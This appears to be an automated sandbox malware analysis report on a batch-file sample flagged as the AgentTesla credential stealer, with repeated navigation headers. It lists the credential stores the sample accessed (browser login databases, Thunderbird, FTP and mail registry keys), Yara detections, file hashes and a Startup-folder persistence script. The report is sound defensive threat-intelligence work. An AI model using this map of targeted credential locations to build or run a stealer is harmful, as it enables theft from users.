Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Yara detected Credential Stealer

Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5092, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.000000000276E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.0000000002872000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.000000000284F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5092, type: MEMORYSTR

Windows Analysis Report
87M9Y3P4Z7.bat

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1545585
Product:	CloudBasic
Start time:	17:40:10
Start date:	30.10.2024
Sample:	87M9Y3P4Z7.bat
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	0403cb08cd9a055952e1153dfd5a2e0e
SHA1:	b42d3e9e49a30671d54217268ae15e6c23b0f226
SHA256:	5be496e81c311cc8c78b7d6422fb51e4b4fc3e332ef54eae2bc6495dac60acc7

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ktqy3wn.ooi.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41utsmme.lr0.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iugmfo5g.xfc.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjg1ezd5.dmv.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\ChannelUris.bat	Unicode text, UTF-8 text, with very long lines (56494), with CRLF, CR, LF line terminators	0403CB08CD9A055952E1153DFD5A2E0E	B42D3E9E49A30671D54217268AE15E6C23B0F226	5BE496E81C311CC8C78B7D6422FB51E4B4FC3E332EF54EAE2BC6495DAC60ACC7
C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	PE32 executable (console) Intel 80386, for MS Windows	C32CA4ACFCC635EC1EA6ED8A34DF5FAC	F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919	73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
C:\Users\user\AppData\Roaming\ChannelUris.bat:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs	ASCII text, with no line terminators	2B48623C11AC2E9942431A79E4956B5A	3196F5855533133279AF7689323F51E333DF1B07	1EF9172E283A367E986753783B1963724043EF68BB0FA6E5198FEBCB3B2A1D20
C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	PE32 executable (console) Intel 80386, for MS Windows	C32CA4ACFCC635EC1EA6ED8A34DF5FAC	F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919	73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70

Windows Analysis Report 87M9Y3P4Z7.bat

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
87M9Y3P4Z7.bat

Malware Threat Intel
Provided by